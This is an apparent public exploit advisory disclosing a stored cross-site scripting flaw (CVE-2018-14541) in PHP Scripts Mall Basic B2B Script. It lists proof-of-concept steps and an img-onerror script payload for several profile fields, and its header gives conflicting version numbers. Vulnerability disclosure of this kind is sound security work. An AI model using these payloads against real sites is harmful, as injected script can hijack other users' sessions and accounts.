Basic B2B Script 2.0.0 Cross Site Scripting

`*******************************************************************************************  
# Exploit Title: PHP Scripts Mall Basic B2B Script 2.0.0 has Stored XSS via the First name, Last name, Address 1, City, State, and Company name fields.  
# Date: 20.07.2018  
# Site Titel : B2B Script  
# Vendor Homepage: https://www.phpscriptsmall.com/  
#Vendor Software : https://www.phpscriptsmall.com/product/professional-b2b-script/  
# Software Link: http://readymadeb2bscript.com/basic-b2b/  
# Category: Web Application  
# Version: 2.0.9  
# Exploit Author: Vikas Chaudhary  
# Contact: https://www.facebook.com/profile.php?id=100011287630308  
# Web: https://gkaim.com/  
#Published on : https://gkaim.com/cve-2018-14541-vikas-chaudhary/  
# Tested on: Windows 10 -Firefox  
# CVE- CVE-2018-14541  
  
*****************************************************************************************  
  
Proof of Concept:-  
--------------------------  
1. Go to the site (https://www.server.com/professional-b2b-script/ ).  
2- Click on Join Free => Fill the Form and Create an Account using your name email and soo on ...  
3- Goto your mail and Verify it.  
4-Come back to site and Login using your Verified Mail and Password.  
6- When loged in ,goto My Profile => Edit Profile and fill the these Scripts in given parameter.  
  
in FIRST NAME => "><img src=x onerror=prompt(/VIKAS/)>  
in LAST NAME => "><img src=x onerror=prompt(/CHAUDHARY/)>  
in ADDRESS 1 => "><img src=x onerror=prompt(/MYAIM/)>  
in ADDRESS 2 => "><img src=x onerror=prompt(/GKAIM/)>  
in CITY => "><img src=x onerror=prompt(/HRFP/)>  
in STATE => "><img src=x onerror=prompt(/ETHICAL/)>  
in COMPANY NAME => "><img src=x onerror=prompt(/HACKER/)>  
  
Now click on SUBMIT and refresh the page   
  
  
You will having popup of /VIKAS/ , /CHAUDHARY/ , / MYAIM/ . /GKAIM/ , /HRPF/ , /ETHICAL/ , /HACKER/ in you account..  
  
***************************************************************************************  
  
`